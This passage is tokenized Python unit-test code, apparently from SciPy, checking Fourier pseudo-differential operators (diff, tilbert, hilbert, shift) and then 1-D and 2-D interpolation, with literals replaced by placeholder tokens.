<NUM_LIT> , <NUM_LIT> ] : <EOL> f = random ( ( n , ) ) <EOL> af = sum ( f , axis = <NUM_LIT:0> ) / n <EOL> f = f - af <EOL> f = diff ( diff ( f , <NUM_LIT:1> ) , - <NUM_LIT:1> ) <EOL> assert_almost_equal ( sum ( f , axis = <NUM_LIT:0> ) , <NUM_LIT:0.0> ) <EOL> assert_array_almost_equal ( diff ( diff ( f , k ) , - k ) , f ) <EOL> assert_array_almost_equal ( diff ( diff ( f , - k ) , k ) , f ) <EOL> class TestTilbert ( TestCase ) : <EOL> def test_definition ( self ) : <EOL> for h in [ <NUM_LIT:0.1> , <NUM_LIT:0.5> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:10> ] : <EOL> for n in [ <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT:64> , <NUM_LIT> ] : <EOL> x = arange ( n ) * <NUM_LIT:2> * pi / n <EOL> y = tilbert ( sin ( x ) , h ) <EOL> y1 = direct_tilbert ( sin ( x ) , h ) <EOL> assert_array_almost_equal ( y , y1 ) <EOL> assert_array_almost_equal ( tilbert ( sin ( x ) , h ) , <EOL> direct_tilbert ( sin ( x ) , h ) ) <EOL> assert_array_almost_equal ( tilbert ( sin ( <NUM_LIT:2> * x ) , h ) , <EOL> direct_tilbert ( sin ( <NUM_LIT:2> * x ) , h ) ) <EOL> def test_random_even ( self ) : <EOL> for h in [ <NUM_LIT:0.1> , <NUM_LIT:0.5> , 
<NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:10> ] : <EOL> for n in [ <NUM_LIT:32> , <NUM_LIT:64> , <NUM_LIT> ] : <EOL> f = random ( ( n , ) ) <EOL> af = sum ( f , axis = <NUM_LIT:0> ) / n <EOL> f = f - af <EOL> assert_almost_equal ( sum ( f , axis = <NUM_LIT:0> ) , <NUM_LIT:0.0> ) <EOL> assert_array_almost_equal ( direct_tilbert ( direct_itilbert ( f , h ) , h ) , f ) <EOL> def test_random_odd ( self ) : <EOL> for h in [ <NUM_LIT:0.1> , <NUM_LIT:0.5> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:10> ] : <EOL> for n in [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] : <EOL> f = random ( ( n , ) ) <EOL> af = sum ( f , axis = <NUM_LIT:0> ) / n <EOL> f = f - af <EOL> assert_almost_equal ( sum ( f , axis = <NUM_LIT:0> ) , <NUM_LIT:0.0> ) <EOL> assert_array_almost_equal ( itilbert ( tilbert ( f , h ) , h ) , f ) <EOL> assert_array_almost_equal ( tilbert ( itilbert ( f , h ) , h ) , f ) <EOL> class TestITilbert ( TestCase ) : <EOL> def test_definition ( self ) : <EOL> for h in [ <NUM_LIT:0.1> , <NUM_LIT:0.5> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:10> ] : <EOL> for n in [ <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT:64> , <NUM_LIT> ] : <EOL> x = arange ( n ) * <NUM_LIT:2> * pi / n <EOL> y = itilbert ( sin ( x ) , h ) <EOL> y1 = direct_itilbert ( sin ( x ) , h ) <EOL> assert_array_almost_equal ( y , y1 ) <EOL> assert_array_almost_equal ( itilbert ( sin ( x ) , h ) , <EOL> direct_itilbert ( sin ( x ) , h ) ) <EOL> assert_array_almost_equal ( itilbert ( sin ( <NUM_LIT:2> * x ) , h ) , <EOL> direct_itilbert ( sin ( <NUM_LIT:2> * x ) , h ) ) <EOL> class TestHilbert ( TestCase ) : <EOL> def test_definition ( self ) : <EOL> for n in [ <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT:64> , <NUM_LIT> ] : <EOL> x = arange ( n ) * <NUM_LIT:2> * pi / n <EOL> y = hilbert ( sin ( x ) ) <EOL> y1 = direct_hilbert ( sin ( x ) ) <EOL> assert_array_almost_equal ( y , y1 ) <EOL> assert_array_almost_equal ( hilbert ( sin ( <NUM_LIT:2> * x ) ) , <EOL> direct_hilbert ( sin ( <NUM_LIT:2> * x ) ) ) <EOL> def test_tilbert_relation ( self ) : <EOL> 
for n in [ <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT:64> , <NUM_LIT> ] : <EOL> x = arange ( n ) * <NUM_LIT:2> * pi / n <EOL> f = sin ( x ) + cos ( <NUM_LIT:2> * x ) * sin ( x ) <EOL> y = hilbert ( f ) <EOL> y1 = direct_hilbert ( f ) <EOL> assert_array_almost_equal ( y , y1 ) <EOL> y2 = tilbert ( f , h = <NUM_LIT:10> ) <EOL> assert_array_almost_equal ( y , y2 ) <EOL> def test_random_odd ( self ) : <EOL> for n in [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] : <EOL> f = random ( ( n , ) ) <EOL> af = sum ( f , axis = <NUM_LIT:0> ) / n <EOL> f = f - af <EOL> assert_almost_equal ( sum ( f , axis = <NUM_LIT:0> ) , <NUM_LIT:0.0> ) <EOL> assert_array_almost_equal ( ihilbert ( hilbert ( f ) ) , f ) <EOL> assert_array_almost_equal ( hilbert ( ihilbert ( f ) ) , f ) <EOL> def test_random_even ( self ) : <EOL> for n in [ <NUM_LIT:32> , <NUM_LIT:64> , <NUM_LIT> ] : <EOL> f = random ( ( n , ) ) <EOL> af = sum ( f , axis = <NUM_LIT:0> ) / n <EOL> f = f - af <EOL> f = diff ( diff ( f , <NUM_LIT:1> ) , - <NUM_LIT:1> ) <EOL> assert_almost_equal ( sum ( f , axis = <NUM_LIT:0> ) , <NUM_LIT:0.0> ) <EOL> assert_array_almost_equal ( direct_hilbert ( direct_ihilbert ( f ) ) , f ) <EOL> assert_array_almost_equal ( hilbert ( ihilbert ( f ) ) , f ) <EOL> class TestIHilbert ( TestCase ) : <EOL> def test_definition ( self ) : <EOL> for n in [ <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT:64> , <NUM_LIT> ] : <EOL> x = arange ( n ) * <NUM_LIT:2> * pi / n <EOL> y = ihilbert ( sin ( x ) ) <EOL> y1 = direct_ihilbert ( sin ( x ) ) <EOL> assert_array_almost_equal ( y , y1 ) <EOL> assert_array_almost_equal ( ihilbert ( sin ( <NUM_LIT:2> * x ) ) , <EOL> direct_ihilbert ( sin ( <NUM_LIT:2> * x ) ) ) <EOL> def test_itilbert_relation ( self ) : <EOL> for n in [ <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT:64> , <NUM_LIT> ] : <EOL> x = arange ( n ) * <NUM_LIT:2> * pi / n <EOL> f = sin ( x ) + cos ( <NUM_LIT:2> * x ) * sin ( x ) <EOL> y = ihilbert ( f ) <EOL> y1 = direct_ihilbert ( f ) <EOL> assert_array_almost_equal ( y , y1 ) <EOL> y2 = 
itilbert ( f , h = <NUM_LIT:10> ) <EOL> assert_array_almost_equal ( y , y2 ) <EOL> class TestShift ( TestCase ) : <EOL> def test_definition ( self ) : <EOL> for n in [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:64> , <NUM_LIT> , <NUM_LIT:32> , <NUM_LIT> , <NUM_LIT> ] : <EOL> x = arange ( n ) * <NUM_LIT:2> * pi / n <EOL> for a in [ <NUM_LIT:0.1> , <NUM_LIT:3> ] : <EOL> assert_array_almost_equal ( shift ( sin ( x ) , a ) , direct_shift ( sin ( x ) , a ) ) <EOL> assert_array_almost_equal ( shift ( sin ( x ) , a ) , sin ( x + a ) ) <EOL> assert_array_almost_equal ( shift ( cos ( x ) , a ) , cos ( x + a ) ) <EOL> assert_array_almost_equal ( shift ( cos ( <NUM_LIT:2> * x ) + sin ( x ) , a ) , <EOL> cos ( <NUM_LIT:2> * ( x + a ) ) + sin ( x + a ) ) <EOL> assert_array_almost_equal ( shift ( exp ( sin ( x ) ) , a ) , exp ( sin ( x + a ) ) ) <EOL> assert_array_almost_equal ( shift ( sin ( x ) , <NUM_LIT:2> * pi ) , sin ( x ) ) <EOL> assert_array_almost_equal ( shift ( sin ( x ) , pi ) , - sin ( x ) ) <EOL> assert_array_almost_equal ( shift ( sin ( x ) , pi / <NUM_LIT:2> ) , cos ( x ) ) <EOL> class TestOverwrite ( object ) : <EOL> """<STR_LIT>""" <EOL> real_dtypes = [ np . float32 , np . float64 ] <EOL> dtypes = real_dtypes + [ np . complex64 , np . complex128 ] <EOL> def _check ( self , x , routine , * args , ** kwargs ) : <EOL> x2 = x . copy ( ) <EOL> routine ( x2 , * args , ** kwargs ) <EOL> sig = routine . __name__ <EOL> if args : <EOL> sig += repr ( args ) <EOL> if kwargs : <EOL> sig += repr ( kwargs ) <EOL> assert_equal ( x2 , x , err_msg = "<STR_LIT>" % sig ) <EOL> def _check_1d ( self , routine , dtype , shape , * args , ** kwargs ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> if np . issubdtype ( dtype , np . complexfloating ) : <EOL> data = np . random . randn ( * shape ) + <NUM_LIT> * np . random . randn ( * shape ) <EOL> else : <EOL> data = np . random . randn ( * shape ) <EOL> data = data . astype ( dtype ) <EOL> self . 
_check ( data , routine , * args , ** kwargs ) <EOL> def test_diff ( self ) : <EOL> for dtype in self . dtypes : <EOL> self . _check_1d ( diff , dtype , ( <NUM_LIT:16> , ) ) <EOL> def test_tilbert ( self ) : <EOL> for dtype in self . dtypes : <EOL> self . _check_1d ( tilbert , dtype , ( <NUM_LIT:16> , ) , <NUM_LIT> ) <EOL> def test_itilbert ( self ) : <EOL> for dtype in self . dtypes : <EOL> self . _check_1d ( itilbert , dtype , ( <NUM_LIT:16> , ) , <NUM_LIT> ) <EOL> def test_hilbert ( self ) : <EOL> for dtype in self . dtypes : <EOL> self . _check_1d ( hilbert , dtype , ( <NUM_LIT:16> , ) ) <EOL> def test_cs_diff ( self ) : <EOL> for dtype in self . dtypes : <EOL> self . _check_1d ( cs_diff , dtype , ( <NUM_LIT:16> , ) , <NUM_LIT:1.0> , <NUM_LIT> ) <EOL> def test_sc_diff ( self ) : <EOL> for dtype in self . dtypes : <EOL> self . _check_1d ( sc_diff , dtype , ( <NUM_LIT:16> , ) , <NUM_LIT:1.0> , <NUM_LIT> ) <EOL> def test_ss_diff ( self ) : <EOL> for dtype in self . dtypes : <EOL> self . _check_1d ( ss_diff , dtype , ( <NUM_LIT:16> , ) , <NUM_LIT:1.0> , <NUM_LIT> ) <EOL> def test_cc_diff ( self ) : <EOL> for dtype in self . dtypes : <EOL> self . _check_1d ( cc_diff , dtype , ( <NUM_LIT:16> , ) , <NUM_LIT:1.0> , <NUM_LIT> ) <EOL> def test_shift ( self ) : <EOL> for dtype in self . dtypes : <EOL> self . _check_1d ( shift , dtype , ( <NUM_LIT:16> , ) , <NUM_LIT:1.0> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> run_module_suite ( ) </s>
<s> from __future__ import division , print_function , absolute_import <EOL> import itertools <EOL> import warnings <EOL> from numpy . testing import ( assert_ , assert_equal , assert_almost_equal , <EOL> assert_array_almost_equal , assert_raises , assert_array_equal , <EOL> dec , TestCase , run_module_suite , assert_allclose ) <EOL> from numpy import mgrid , pi , sin , ogrid , poly1d , linspace <EOL> import numpy as np <EOL> from scipy . _lib . six import xrange <EOL> from scipy . interpolate import ( interp1d , interp2d , lagrange , PPoly , BPoly , <EOL> ppform , splrep , splev , splantider , splint , sproot , Akima1DInterpolator , <EOL> RegularGridInterpolator , LinearNDInterpolator , NearestNDInterpolator , <EOL> RectBivariateSpline , interpn , NdPPoly ) <EOL> from scipy . special import poch , gamma <EOL> from scipy . interpolate import _ppoly <EOL> from scipy . _lib . _gcutils import assert_deallocated <EOL> from scipy . integrate import nquad <EOL> class TestInterp2D ( TestCase ) : <EOL> def test_interp2d ( self ) : <EOL> y , x = mgrid [ <NUM_LIT:0> : <NUM_LIT:2> : <NUM_LIT> , <NUM_LIT:0> : pi : <NUM_LIT> ] <EOL> z = sin ( x + <NUM_LIT:0.5> * y ) <EOL> I = interp2d ( x , y , z ) <EOL> assert_almost_equal ( I ( <NUM_LIT:1.0> , <NUM_LIT> ) , sin ( <NUM_LIT> ) , decimal = <NUM_LIT:2> ) <EOL> v , u = ogrid [ <NUM_LIT:0> : <NUM_LIT:2> : <NUM_LIT> , <NUM_LIT:0> : pi : <NUM_LIT> ] <EOL> assert_almost_equal ( I ( u . ravel ( ) , v . ravel ( ) ) , sin ( u + <NUM_LIT:0.5> * v ) , decimal = <NUM_LIT:2> ) <EOL> def test_interp2d_meshgrid_input ( self ) : <EOL> x = linspace ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:16> ) <EOL> y = linspace ( <NUM_LIT:0> , pi , <NUM_LIT> ) <EOL> z = sin ( x [ None , : ] + y [ : , None ] / <NUM_LIT> ) <EOL> I = interp2d ( x , y , z ) <EOL> assert_almost_equal ( I ( <NUM_LIT:1.0> , <NUM_LIT> ) , sin ( <NUM_LIT> ) , decimal = <NUM_LIT:2> ) <EOL> def test_interp2d_meshgrid_input_unsorted ( self ) : <EOL> np . random . 
seed ( <NUM_LIT> ) <EOL> x = linspace ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:16> ) <EOL> y = linspace ( <NUM_LIT:0> , pi , <NUM_LIT> ) <EOL> z = sin ( x [ None , : ] + y [ : , None ] / <NUM_LIT> ) <EOL> ip1 = interp2d ( x . copy ( ) , y . copy ( ) , z , kind = '<STR_LIT>' ) <EOL> np . random . shuffle ( x ) <EOL> z = sin ( x [ None , : ] + y [ : , None ] / <NUM_LIT> ) <EOL> ip2 = interp2d ( x . copy ( ) , y . copy ( ) , z , kind = '<STR_LIT>' ) <EOL> np . random . shuffle ( x ) <EOL> np . random . shuffle ( y ) <EOL> z = sin ( x [ None , : ] + y [ : , None ] / <NUM_LIT> ) <EOL> ip3 = interp2d ( x , y , z , kind = '<STR_LIT>' ) <EOL> x = linspace ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT> ) <EOL> y = linspace ( <NUM_LIT:0> , pi , <NUM_LIT:30> ) <EOL> assert_equal ( ip1 ( x , y ) , ip2 ( x , y ) ) <EOL> assert_equal ( ip1 ( x , y ) , ip3 ( x , y ) ) <EOL> def test_interp2d_eval_unsorted ( self ) : <EOL> y , x = mgrid [ <NUM_LIT:0> : <NUM_LIT:2> : <NUM_LIT> , <NUM_LIT:0> : pi : <NUM_LIT> ] <EOL> z = sin ( x + <NUM_LIT:0.5> * y ) <EOL> func = interp2d ( x , y , z ) <EOL> xe = np . array ( [ <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] ) <EOL> ye = np . array ( [ <NUM_LIT> , <NUM_LIT> ] ) <EOL> assert_allclose ( func ( xe , ye ) , func ( xe , ye [ : : - <NUM_LIT:1> ] ) ) <EOL> assert_raises ( ValueError , func , xe , ye [ : : - <NUM_LIT:1> ] , <NUM_LIT:0> , <NUM_LIT:0> , True ) <EOL> def test_interp2d_linear ( self ) : <EOL> a = np . zeros ( [ <NUM_LIT:5> , <NUM_LIT:5> ] ) <EOL> a [ <NUM_LIT:2> , <NUM_LIT:2> ] = <NUM_LIT:1.0> <EOL> x = y = np . arange ( <NUM_LIT:5> ) <EOL> b = interp2d ( x , y , a , '<STR_LIT>' ) <EOL> assert_almost_equal ( b ( <NUM_LIT> , <NUM_LIT> ) , np . array ( [ <NUM_LIT:0.5> ] ) , decimal = <NUM_LIT:2> ) <EOL> assert_almost_equal ( b ( <NUM_LIT> , <NUM_LIT> ) , np . array ( [ <NUM_LIT:0.5> ] ) , decimal = <NUM_LIT:2> ) <EOL> def test_interp2d_bounds ( self ) : <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:5> ) <EOL> y = np . 
linspace ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:7> ) <EOL> z = x [ None , : ] ** <NUM_LIT:2> + y [ : , None ] <EOL> ix = np . linspace ( - <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT> ) <EOL> iy = np . linspace ( - <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT> ) <EOL> b = interp2d ( x , y , z , bounds_error = True ) <EOL> assert_raises ( ValueError , b , ix , iy ) <EOL> b = interp2d ( x , y , z , fill_value = np . nan ) <EOL> iz = b ( ix , iy ) <EOL> mx = ( ix < <NUM_LIT:0> ) | ( ix > <NUM_LIT:1> ) <EOL> my = ( iy < <NUM_LIT:0> ) | ( iy > <NUM_LIT:2> ) <EOL> assert_ ( np . isnan ( iz [ my , : ] ) . all ( ) ) <EOL> assert_ ( np . isnan ( iz [ : , mx ] ) . all ( ) ) <EOL> assert_ ( np . isfinite ( iz [ ~ my , : ] [ : , ~ mx ] ) . all ( ) ) <EOL> class TestInterp1D ( object ) : <EOL> def setUp ( self ) : <EOL> self . x5 = np . arange ( <NUM_LIT> ) <EOL> self . x10 = np . arange ( <NUM_LIT> ) <EOL> self . y10 = np . arange ( <NUM_LIT> ) <EOL> self . x25 = self . x10 . reshape ( ( <NUM_LIT:2> , <NUM_LIT:5> ) ) <EOL> self . x2 = np . arange ( <NUM_LIT> ) <EOL> self . y2 = np . arange ( <NUM_LIT> ) <EOL> self . x1 = np . array ( [ <NUM_LIT:0.> ] ) <EOL> self . y1 = np . array ( [ <NUM_LIT:0.> ] ) <EOL> self . y210 = np . arange ( <NUM_LIT> ) . reshape ( ( <NUM_LIT:2> , <NUM_LIT:10> ) ) <EOL> self . y102 = np . arange ( <NUM_LIT> ) . reshape ( ( <NUM_LIT:10> , <NUM_LIT:2> ) ) <EOL> self . y225 = np . arange ( <NUM_LIT> ) . reshape ( ( <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:5> ) ) <EOL> self . y25 = np . arange ( <NUM_LIT> ) . reshape ( ( <NUM_LIT:2> , <NUM_LIT:5> ) ) <EOL> self . y235 = np . arange ( <NUM_LIT> ) . reshape ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:5> ) ) <EOL> self . y325 = np . arange ( <NUM_LIT> ) . reshape ( ( <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:5> ) ) <EOL> self . fill_value = - <NUM_LIT> <EOL> def test_validation ( self ) : <EOL> interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' ) <EOL> interp1d ( self . x10 , self . 
y10 , kind = '<STR_LIT>' ) <EOL> interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' ) <EOL> interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' ) <EOL> interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' ) <EOL> interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' ) <EOL> interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' , fill_value = "<STR_LIT>" ) <EOL> interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' , fill_value = "<STR_LIT>" ) <EOL> interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' , fill_value = ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' , <EOL> fill_value = np . array ( [ - <NUM_LIT:1> ] ) ) <EOL> interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' , <EOL> fill_value = ( - <NUM_LIT:1> , ) ) <EOL> interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' , <EOL> fill_value = - <NUM_LIT:1> ) <EOL> interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' , <EOL> fill_value = ( - <NUM_LIT:1> , - <NUM_LIT:1> ) ) <EOL> interp1d ( self . x10 , self . y10 , kind = <NUM_LIT:0> ) <EOL> interp1d ( self . x10 , self . y10 , kind = <NUM_LIT:1> ) <EOL> interp1d ( self . x10 , self . y10 , kind = <NUM_LIT:2> ) <EOL> interp1d ( self . x10 , self . y10 , kind = <NUM_LIT:3> ) <EOL> interp1d ( self . x10 , self . y210 , kind = '<STR_LIT>' , axis = - <NUM_LIT:1> , <EOL> fill_value = ( - <NUM_LIT:1> , - <NUM_LIT:1> ) ) <EOL> interp1d ( self . x2 , self . y210 , kind = '<STR_LIT>' , axis = <NUM_LIT:0> , <EOL> fill_value = np . ones ( <NUM_LIT:10> ) ) <EOL> interp1d ( self . x2 , self . y210 , kind = '<STR_LIT>' , axis = <NUM_LIT:0> , <EOL> fill_value = ( np . ones ( <NUM_LIT:10> ) , np . ones ( <NUM_LIT:10> ) ) ) <EOL> interp1d ( self . x2 , self . y210 , kind = '<STR_LIT>' , axis = <NUM_LIT:0> , <EOL> fill_value = ( np . ones ( <NUM_LIT:10> ) , - <NUM_LIT:1> ) ) <EOL> for kind in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> assert_raises ( ValueError , interp1d , self . 
x10 , self . y10 , kind = kind , <EOL> fill_value = "<STR_LIT>" ) <EOL> assert_raises ( ValueError , interp1d , self . x25 , self . y10 ) <EOL> assert_raises ( ValueError , interp1d , self . x10 , np . array ( <NUM_LIT:0> ) ) <EOL> assert_raises ( ValueError , interp1d , self . x10 , self . y2 ) <EOL> assert_raises ( ValueError , interp1d , self . x2 , self . y10 ) <EOL> assert_raises ( ValueError , interp1d , self . x10 , self . y102 ) <EOL> interp1d ( self . x10 , self . y210 ) <EOL> interp1d ( self . x10 , self . y102 , axis = <NUM_LIT:0> ) <EOL> assert_raises ( ValueError , interp1d , self . x1 , self . y10 ) <EOL> assert_raises ( ValueError , interp1d , self . x10 , self . y1 ) <EOL> assert_raises ( ValueError , interp1d , self . x1 , self . y1 ) <EOL> assert_raises ( ValueError , interp1d , self . x10 , self . y10 , kind = '<STR_LIT>' , <EOL> fill_value = ( - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) ) <EOL> assert_raises ( ValueError , interp1d , self . x10 , self . y10 , kind = '<STR_LIT>' , <EOL> fill_value = [ - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ] ) <EOL> assert_raises ( ValueError , interp1d , self . x10 , self . y10 , kind = '<STR_LIT>' , <EOL> fill_value = np . array ( ( - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) ) ) <EOL> assert_raises ( ValueError , interp1d , self . x10 , self . y10 , kind = '<STR_LIT>' , <EOL> fill_value = [ [ - <NUM_LIT:1> ] ] ) <EOL> assert_raises ( ValueError , interp1d , self . x10 , self . y10 , kind = '<STR_LIT>' , <EOL> fill_value = [ - <NUM_LIT:1> , - <NUM_LIT:1> ] ) <EOL> assert_raises ( ValueError , interp1d , self . x10 , self . y10 , kind = '<STR_LIT>' , <EOL> fill_value = np . array ( [ ] ) ) <EOL> assert_raises ( ValueError , interp1d , self . x10 , self . y10 , kind = '<STR_LIT>' , <EOL> fill_value = ( ) ) <EOL> assert_raises ( ValueError , interp1d , self . x2 , self . 
y210 , kind = '<STR_LIT>' , <EOL> axis = <NUM_LIT:0> , fill_value = [ - <NUM_LIT:1> , - <NUM_LIT:1> ] ) <EOL> assert_raises ( ValueError , interp1d , self . x2 , self . y210 , kind = '<STR_LIT>' , <EOL> axis = <NUM_LIT:0> , fill_value = ( <NUM_LIT:0.> , [ - <NUM_LIT:1> , - <NUM_LIT:1> ] ) ) <EOL> def test_init ( self ) : <EOL> assert_ ( interp1d ( self . x10 , self . y10 ) . copy ) <EOL> assert_ ( not interp1d ( self . x10 , self . y10 , copy = False ) . copy ) <EOL> assert_ ( interp1d ( self . x10 , self . y10 ) . bounds_error ) <EOL> assert_ ( not interp1d ( self . x10 , self . y10 , bounds_error = False ) . bounds_error ) <EOL> assert_ ( np . isnan ( interp1d ( self . x10 , self . y10 ) . fill_value ) ) <EOL> assert_equal ( interp1d ( self . x10 , self . y10 , fill_value = <NUM_LIT> ) . fill_value , <EOL> <NUM_LIT> ) <EOL> assert_equal ( interp1d ( self . x10 , self . y10 , fill_value = ( <NUM_LIT:1.0> , <NUM_LIT> ) ) . fill_value , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> ) ) <EOL> assert_equal ( interp1d ( self . x10 , self . y10 ) . axis , <NUM_LIT:0> ) <EOL> assert_equal ( interp1d ( self . x10 , self . y210 ) . axis , <NUM_LIT:1> ) <EOL> assert_equal ( interp1d ( self . x10 , self . y102 , axis = <NUM_LIT:0> ) . axis , <NUM_LIT:0> ) <EOL> assert_array_equal ( interp1d ( self . x10 , self . y10 ) . x , self . x10 ) <EOL> assert_array_equal ( interp1d ( self . x10 , self . y10 ) . y , self . y10 ) <EOL> assert_array_equal ( interp1d ( self . x10 , self . y210 ) . y , self . y210 ) <EOL> def test_assume_sorted ( self ) : <EOL> interp10 = interp1d ( self . x10 , self . y10 ) <EOL> interp10_unsorted = interp1d ( self . x10 [ : : - <NUM_LIT:1> ] , self . y10 [ : : - <NUM_LIT:1> ] ) <EOL> assert_array_almost_equal ( interp10_unsorted ( self . x10 ) , self . y10 ) <EOL> assert_array_almost_equal ( interp10_unsorted ( <NUM_LIT> ) , np . 
array ( [ <NUM_LIT> ] ) ) <EOL> assert_array_almost_equal ( interp10_unsorted ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , <EOL> interp10 ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) ) <EOL> interp10_assume_kw = interp1d ( self . x10 [ : : - <NUM_LIT:1> ] , self . y10 [ : : - <NUM_LIT:1> ] , <EOL> assume_sorted = False ) <EOL> assert_array_almost_equal ( interp10_assume_kw ( self . x10 ) , self . y10 ) <EOL> interp10_assume_kw2 = interp1d ( self . x10 [ : : - <NUM_LIT:1> ] , self . y10 [ : : - <NUM_LIT:1> ] , <EOL> assume_sorted = True ) <EOL> assert_raises ( ValueError , interp10_assume_kw2 , self . x10 ) <EOL> interp10_y_2d = interp1d ( self . x10 , self . y210 ) <EOL> interp10_y_2d_unsorted = interp1d ( self . x10 [ : : - <NUM_LIT:1> ] , self . y210 [ : , : : - <NUM_LIT:1> ] ) <EOL> assert_array_almost_equal ( interp10_y_2d ( self . x10 ) , <EOL> interp10_y_2d_unsorted ( self . x10 ) ) <EOL> def test_linear ( self ) : <EOL> interp10 = interp1d ( self . x10 , self . y10 ) <EOL> assert_array_almost_equal ( interp10 ( self . x10 ) , self . y10 ) <EOL> assert_array_almost_equal ( interp10 ( <NUM_LIT> ) , np . array ( [ <NUM_LIT> ] ) ) <EOL> assert_array_almost_equal ( interp10 ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , <EOL> np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) ) <EOL> extrapolator = interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' , <EOL> fill_value = '<STR_LIT>' ) <EOL> assert_allclose ( extrapolator ( [ - <NUM_LIT:1.> , <NUM_LIT:0> , <NUM_LIT:9> , <NUM_LIT:11> ] ) , <EOL> [ - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:9> , <NUM_LIT:11> ] , rtol = <NUM_LIT> ) <EOL> opts = dict ( kind = '<STR_LIT>' , <EOL> fill_value = '<STR_LIT>' , <EOL> bounds_error = True ) <EOL> assert_raises ( ValueError , interp1d , self . x10 , self . y10 , ** opts ) <EOL> def test_linear_dtypes ( self ) : <EOL> for dtyp in np . sctypes [ "<STR_LIT:float>" ] : <EOL> x = np . 
arange ( <NUM_LIT:8> , dtype = dtyp ) <EOL> y = x <EOL> yp = interp1d ( x , y , kind = '<STR_LIT>' ) ( x ) <EOL> assert_equal ( yp . dtype , dtyp ) <EOL> assert_allclose ( yp , y , atol = <NUM_LIT> ) <EOL> def test_cubic ( self ) : <EOL> interp10 = interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' ) <EOL> assert_array_almost_equal ( interp10 ( self . x10 ) , self . y10 ) <EOL> assert_array_almost_equal ( interp10 ( <NUM_LIT> ) , np . array ( [ <NUM_LIT> ] ) ) <EOL> assert_array_almost_equal ( interp10 ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , <EOL> np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , ) <EOL> def test_nearest ( self ) : <EOL> interp10 = interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' ) <EOL> assert_array_almost_equal ( interp10 ( self . x10 ) , self . y10 ) <EOL> assert_array_almost_equal ( interp10 ( <NUM_LIT> ) , np . array ( <NUM_LIT:1.> ) ) <EOL> assert_array_almost_equal ( interp10 ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , <EOL> np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , ) <EOL> extrapolator = interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' , <EOL> fill_value = '<STR_LIT>' ) <EOL> assert_allclose ( extrapolator ( [ - <NUM_LIT:1.> , <NUM_LIT:0> , <NUM_LIT:9> , <NUM_LIT:11> ] ) , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:9> , <NUM_LIT:9> ] , rtol = <NUM_LIT> ) <EOL> opts = dict ( kind = '<STR_LIT>' , <EOL> fill_value = '<STR_LIT>' , <EOL> bounds_error = True ) <EOL> assert_raises ( ValueError , interp1d , self . x10 , self . y10 , ** opts ) <EOL> @ dec . knownfailureif ( True , "<STR_LIT>" ) <EOL> def test_zero ( self ) : <EOL> interp10 = interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' ) <EOL> assert_array_almost_equal ( interp10 ( self . x10 ) , self . y10 ) <EOL> assert_array_almost_equal ( interp10 ( <NUM_LIT> ) , np . array ( <NUM_LIT:1.> ) ) <EOL> assert_array_almost_equal ( interp10 ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , <EOL> np . 
